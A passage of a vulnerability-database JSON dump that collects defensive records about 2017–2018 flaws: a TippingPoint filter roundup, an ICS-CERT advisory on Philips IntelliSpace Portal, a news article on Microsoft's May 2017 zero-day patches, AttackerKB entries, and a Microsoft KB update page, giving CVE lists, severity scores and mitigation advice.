You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n * 28094: ZDI-CAN-4564: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28099: ZDI-CAN-4565: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28100: ZDI-CAN-4566: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28101: ZDI-CAN-4567: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28202: ZDI-CAN-4715, 4716: Zero Day Initiative Vulnerability (Adobe Reader DC)\n\n**_EMC (6)_**\n\n * 28102: ZDI-CAN-4694: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28103: ZDI-CAN-4695: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28104: ZDI-CAN-4696: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28105: ZDI-CAN-4698: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28106: ZDI-CAN-4699: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28107: ZDI-CAN-4710: Zero Day Initiative Vulnerability (EMC AppSync)\n\n**_NetGain (3)_**\n\n * 28108: ZDI-CAN-4749: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28109: ZDI-CAN-4750: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28110: ZDI-CAN-4751: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n\n**Updated Existing Zero-Day Filters**\n\nThis section highlights specific filter(s) of interest in this week\u2019s Digital Vaccine package that have been updated as a result of a vendor either issuing a patch for a vulnerability found via the Zero Day Initiative or a vulnerability that has been published by the Zero Day Initiative in accordance with its [Disclosure 
Policy](<http://zerodayinitiative.com/advisories/disclosure_policy/>).\n\nThree of the filters we have for this month\u2019s Microsoft bulletins are a direct result of the Zero Day Initiative\u2019s Pwn2Own contest held in March. These filters have been updated to reflect the fact that the vulnerabilities have been patched:\n\n * 27532: HTTP: Microsoft Edge Chakra JIT Array Memory Corruption Vulnerability (Pwn2Own)\n * 27538: HTTP: Microsoft Edge Chakra Array Splice Use-After-Free Vulnerability (Pwn2Own)\n * 27540: HTTP: Microsoft Edge Chakra Array Unshift Buffer Overflow Vulnerability (Pwn2Own)\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-1-2017/>).", "cvss3": {}, "published": "2017-05-12T16:47:57", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 8, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0290", "CVE-2017-0248", "CVE-2017-5689", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0220", "CVE-2017-0224", "CVE-2017-0281", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0254", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0264", "CVE-2017-0077", "CVE-2017-0255", "CVE-2017-0221", "CVE-2017-0243", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0242", "CVE-2017-0262", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0265", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", 
"CVE-2017-0261", "CVE-2017-0175"], "modified": "2017-05-12T16:47:57", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/", "id": "TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2022-04-26T22:14:13", "description": "## OVERVIEW\n\nPhilips reported vulnerabilities in the Philips\u2019 IntelliSpace Portal (ISP), an advanced visualization and image analysis system. Philips is creating a software update to mitigate these vulnerabilities in the affected products. Additionally, they are issuing mitigating controls for some vulnerabilities.\n\nSome vulnerabilities could be exploited remotely.\n\nExploits that target some vulnerabilities are publicly available.\n\n## AFFECTED PRODUCTS\n\nPhilips reports that these vulnerabilities affect the following versions of the ISP:\n\n * IntelliSpace Portal, all 8.0.x versions, and\n * IntelliSpace Portal, all 7.0.x versions.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to gain unauthorized access to sensitive information, perform man-in-the-middle attacks, create denial of service conditions, or execute arbitrary code.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment and specific clinical usage.\n\n## BACKGROUND\n\nPhilips is a global company that maintains offices in many countries around the world, including countries in Africa, Asia, Europe, Latin America, the Middle East, and North America.\n\nThe Philips ISP processes clinical images from different modalities and enables advanced visualization of the images. ISP systems are deployed across the Healthcare and Public Health sectors. 
Philips estimates these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nThe ISP has multiple input validation vulnerabilities that could allow a remote attacker to execute arbitrary code or cause the application to crash.\n\n[CVE-2018-5474](<https://nvd.nist.gov/vuln/detail/CVE-2018-5474>), [CVE-2017-0143](<https://nvd.nist.gov/vuln/detail/CVE-2017-0143>), [CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), [CVE-2017-0146](<https://nvd.nist.gov/vuln/detail/CVE-2017-0146>), [CVE-2017-0148](<https://nvd.nist.gov/vuln/detail/CVE-2017-0148>), [CVE-2017-0272](<https://nvd.nist.gov/vuln/detail/CVE-2017-0272>), [CVE-2017-0277](<https://nvd.nist.gov/vuln/detail/CVE-2017-0277>), [CVE-2017-0278](<https://nvd.nist.gov/vuln/detail/CVE-2017-0278>), [CVE-2017-0279](<https://nvd.nist.gov/vuln/detail/CVE-2017-0279>), [CVE-2017-0269](<https://nvd.nist.gov/vuln/detail/CVE-2017-0269>), [CVE-2017-0273](<https://nvd.nist.gov/vuln/detail/CVE-2017-0273>), and [CVE-2017-0280](<https://nvd.nist.gov/vuln/detail/CVE-2017-0280>) have been assigned to these vulnerabilities. 
The CVSS v3 base scores for these vulnerabilities range from 5.9 to 8.1.\n\n### [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThe ISP has multiple information exposure vulnerabilities that could allow an attacker to gain unauthorized access to sensitive information.\n\n[CVE-2017-0147](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147>), [CVE-2017-0267](<https://nvd.nist.gov/vuln/detail/CVE-2017-0267>), [CVE-2017-0268](<https://nvd.nist.gov/vuln/detail/CVE-2017-0268>), [CVE-2017-0270](<https://nvd.nist.gov/vuln/detail/CVE-2017-0270>), [CVE-2017-0271](<https://nvd.nist.gov/vuln/detail/CVE-2017-0271>), [CVE-2017-0274](<https://nvd.nist.gov/vuln/detail/CVE-2017-0274>), [CVE-2017-0275](<https://nvd.nist.gov/vuln/detail/CVE-2017-0275>), and [CVE-2017-0276](<https://nvd.nist.gov/vuln/detail/CVE-2017-0276>) have been assigned to these vulnerabilities. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n### [PERMISSIONS, PRIVILEGES, AND ACCESS CONTROLS CWE-264](<https://cwe.mitre.org/data/definitions/264.html>)\n\nThe ISP has multiple permission, privilege and access control vulnerabilities that could allow an attacker to gain unauthorized access and in some cases escalate their level of privilege or execute arbitrary code.\n\n[CVE-2018-5472](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5472>), [CVE-2018-5468](<https://nvd.nist.gov/vuln/detail/CVE-2018-5468>), [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>), and [CVE-2005-1794](<https://nvd.nist.gov/vuln/detail/CVE-20005-1794>) have been assigned to these vulnerabilities. 
The CVSS v3 base scores for these vulnerabilities range from 6.4 to 7.8.\n\n### [UNQUOTED SEARCH PATH OR ELEMENT CWE-428](<https://cwe.mitre.org/data/definitions/428.html>)\n\nAn unquoted search path or element vulnerability has been identified, which may allow an authorized local user to execute arbitrary code and escalate their level of privileges.\n\n[CVE-2018-5470](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5470>) has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is ([AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n### [LEFTOVER DEBUG CODE CWE-489](<https://cwe.mitre.org/data/definitions/489.html>)\n\nThe ISP has a vulnerability where code debugging methods are enabled, which could allow an attacker to remotely execute arbitrary code during runtime.\n\n[CVE-2018-5454](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5454>) has been assigned to this vulnerability. 
A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N>)).\n\n### [CRYPTOGRAPHIC ISSUES CWE-310](<https://cwe.mitre.org/data/definitions/310.html>)\n\nThe ISP has multiple cryptographic vulnerabilities that could allow an attacker to gain unauthorized access to resources and information.\n\n[CVE-2018-5458](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5458>), [CVE-2018-5462](<https://nvd.nist.gov/vuln/detail/CVE-2018-5462>), [CVE-2018-5464](<https://nvd.nist.gov/vuln/detail/CVE-2018-5464>), [CVE-2018-5466](<https://nvd.nist.gov/vuln/detail/CVE-2018-5466>), [CVE-2011-3389](<https://nvd.nist.gov/vuln/detail/CVE-2011-3389>), [CVE-2004-2761](<https://nvd.nist.gov/vuln/detail/CVE-2004-2761>), [CVE-2014-3566](<https://nvd.nist.gov/vuln/detail/CVE-2014-3566>), and [CVE-2016-2183](<https://nvd.nist.gov/vuln/detail/CVE-2016-2183>) have been assigned to these vulnerabilities. The CVSS v3 base scores for these vulnerabilities range from 3.1 to 6.5.\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nSome vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nPublic exploits exist for some of these vulnerabilities; however, none are known to specifically target Philips ISP.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nPhilips will release an updated version of the ISP in the coming months that will address these vulnerabilities. Additionally, Philips\u2019 evaluation of Operating System security patches is ongoing, and after appropriate testing, the patches and mitigating controls are posted on Philips\u2019 InCenter. 
ISP users are recommended to obtain available mitigating controls by accessing their InCenter account at this location:\n\n<http://incenter.medical.philips.com>\n\nUsers with questions regarding their specific ISP installations are advised by Philips to contact their local Philips service support team or their regional service support.\n\nPhilips\u2019 contact information is available at the following location:\n\n<https://www.usa.philips.com/healthcare/solutions/customer-service-solutions>\n\nPlease see the Philips product security website for the latest security information for Philips products:\n\n<https://www.philips.com/productsecurity>\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate all medical devices and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. 
NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the NCCIC Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-18-058-02>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-27T00:00:00", "type": "ics", "title": "Philips Intellispace Portal ISP Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2761", "CVE-2005-1794", "CVE-2011-3389", "CVE-2014-3566", "CVE-2016-2183", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0199", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2018-5454", "CVE-2018-5458", 
"CVE-2018-5462", "CVE-2018-5464", "CVE-2018-5466", "CVE-2018-5468", "CVE-2018-5470", "CVE-2018-5472", "CVE-2018-5474"], "modified": "2018-02-27T00:00:00", "id": "ICSMA-18-058-02", "href": "https://www.us-cert.gov/ics/advisories/ICSMA-18-058-02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:39", "description": "[](<https://1.bp.blogspot.com/-vpXxMS5a1OQ/WRLsUKCC4II/AAAAAAAAsiw/8zkd69jstykdsFIkaYYDa9lAVVLKnZO2QCLcB/s1600/windows-zero-day-exploit.png>)\n\n \nAs part of this month's Patch Tuesday, Microsoft has released security patches for a total of 55 vulnerabilities across its products, including fixes for four zero-day vulnerabilities being exploited in the wild. \n \nJust yesterday, Microsoft released an [emergency out-of-band update](<https://thehackernews.com/2017/05/windows-defender-rce-flaw.html>) separately to patch a remote execution bug ([CVE-2017-0290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0290>)) in Microsoft's Antivirus Engine that comes enabled by default on Windows 7, 8.1, RT, 10 and Server 2016 operating systems. \n \nThe vulnerability, reported by Google Project Zero researchers, could allow an attacker to take over your Windows PC with just an email, which you haven't even opened yet. \n \n**_May 2017 Patch Tuesday_ \u2014** Out of 55 vulnerabilities, 17 have been rated as critical and affect the company's main operating systems, along with other products like Office, Edge, Internet Explorer, and the malware protection engine used in most of the Microsoft's anti-malware products. \n \nSysadmins all over the world should prioritize the May's Patch Tuesday as it addresses four critical zero-day vulnerabilities, three of which being actively exploited by cyber-espionage groups in targeted attacks over the past few months. 
\n \n\n\n### 3 Zero-Days Were Exploited in the Wild by Russian Cyber-Espionage Group\n\n \n**_First Zero-Day Vulnerability ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>))_ \u2014** It affects the 32- and 64-bit versions of Microsoft Office 2010, 2013 and 2016, and resides in how Office handles Encapsulated PostScript (EPS) image files, leading to remote code execution (RCE) on the system. \n \nThis Office vulnerability could be exploited by tricking victims into opening a file containing a malformed graphics image in an email. The attack also exploits a Windows privilege escalation bug ([CVE-2017-0001](<https://technet.microsoft.com/en-us/library/security/ms17-013.aspx>)) that the company patched on March 14 to gain full control over the system \u2013 essentially allowing attackers to install spyware and other malware. \n \nAccording to the [FireEye](<https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html>) researchers, the CVE-2017-0261 flaw has been exploited since late March by an unknown group of financially motivated hackers and by a Russian cyber espionage group called Turla, also known as Snake or Uroburos. \n \n**Second Zero-Day Vulnerability ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) \u2014 **FireEye and [ESET](<https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/>) researchers believe that the APT28 hacking group, also known as Fancy Bear, or Pawn Storm, was actively using this EPS-related Microsoft Office zero-day vulnerability which leads to remote code execution on opening a malformed file. 
\n \n**_Third Zero-Day Vulnerability ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>))_ \u2014 **The third zero-day bug is an elevation of privilege (EoP) vulnerability in all supported versions of Microsoft's Windows operating system. \n \nThis vulnerability exists in the way Windows kernel-mode driver handles objects in memory, allowing attackers to run arbitrary code in kernel mode and then install malware, view, change, or delete data, and even create new accounts with full user rights. \n \nResearchers believe that the Russian cyber-espionage group was also actively exploiting this flaw (CVE-2017-0263) along with the second zero-day vulnerability (CVE-2017-0262). \n \n**_Fourth Zero-Day Vulnerability ([CVE-2017-0222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0222>))_ \u2014 **Another zero-day vulnerability affects Internet Explorer 10 and 11 and resides in how Internet Explorer handles objects in memory. \n \nOpening a malicious web page can corrupt memory to trigger remote code execution, allowing attackers to take control of an affected system. According to the tech giant, this issue was also exploited in the wild. \n \n**_Patches for Other Critical Vulnerabilities_ \u2014** This month's security updates also fix critical vulnerabilities in both Edge and Internet Explorer (IE) that could lead to remote code execution by tricking victims into visiting malicious websites or viewing specially crafted advertisements inside the browsers. 
\n \nBesides this, Microsoft also addresses four critical remote code execution bugs ([CVE-2017-0272](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0272>), [CVE-2017-0277](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0277>), [CVE-2017-0278](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0278>), and [CVE-2017-0279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0279>)) in the Windows SMB network file-sharing protocol, which affect Windows 7 through 10 and Windows Server 2008 through 2016. \n \nThese vulnerabilities put Windows PCs and server installations at risk of hacking if they use SMBv1, though there have been no reports of any of these flaws being exploited in the wild. \n \nAs usual, Adobe Flash Player patches are also included in the security update to address [7 CVE-listed flaws](<https://helpx.adobe.com/security/products/flash-player/apsb17-15.html>) on Windows, macOS, and Linux. 
\n \nWindows users are strongly advised to install the latest updates as soon as possible in order to protect themselves against the active attacks in the wild.\n", "cvss3": {}, "published": "2017-05-09T23:37:00", "type": "thn", "title": "Microsoft Issues Patches for Another Four Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0001", "CVE-2017-0290", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0263", "CVE-2017-0278", "CVE-2017-0277", "CVE-2017-0222", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-10T10:37:40", "id": "THN:35CDED923C2A70050CA53879EA860398", "href": "https://thehackernews.com/2017/05/patch-windows-zero-days.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-07-21T02:03:43", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \u201cWindows COM Elevation of Privilege Vulnerability\u201d. 
This CVE ID is unique from CVE-2017-0214.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2021-07-27T00:00:00", "id": "AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "href": "https://attackerkb.com/topics/1PgDqHxZcV/cve-2017-0213", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-27T21:14:17", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:11am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability 
spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0263", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2021-07-27T00:00:00", "id": "AKB:FD8F3671-7E1D-4B44-B0A0-D4BBEA6DA814", "href": "https://attackerkb.com/topics/vtnaonG5oN/cve-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:39:51", "description": "<html><body><p>Resolves a vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\">An elevation of privilege exists in Windows COM Aggregate Marshaler. 
An elevation of privilege vulnerability exists when Windows does not validate input correctly before it loads type libraries.<br/><br/>To learn more about the vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):<ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0213\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0213</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0214\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0214</a></li></ul></div><h2>Fixes that are included in this security update</h2><ul><li>Addresses an issue in which some scanners and serial devices may stop working after security update <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://support.microsoft.com/en-us/help/4074852/security-update-for-vulnerabilities-in-windows-wes09-and-posready-2009\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">4074852</a>\u00a0is applied.</li></ul><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3>Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to turn on automatic updating, see <a href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faqx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4466388\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website.</div></div><p><strong class=\"sbody-strong\">Important </strong></p><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul><h2>More information</h2><h3>Prerequisites</h3><p>There are no prerequisites for installing this update.</p><h3>Restart information</h3><p>You may have to restart the computer after you apply this update.</p><h3>Update replacement information</h3><p>This update doesn't replace a previously released update.</p><h2>More information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\"><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" managed-link=\"\" target=\"_blank\">Protect yourself online</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: 
<a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></span></div><span> </span></td></tr></tbody></table></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>WindowsXP-KB4466388-x86-Embedded-ENU.exe</td><td>A55F6E9011156548AB9722DE332F609B17B415D0</td><td>A742F8B84FF530CC7A0205B629C9677352EA85B258DE020224AC6D9E279A8A02</td></tr></tbody></table></td></tr></tbody></table><p><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on 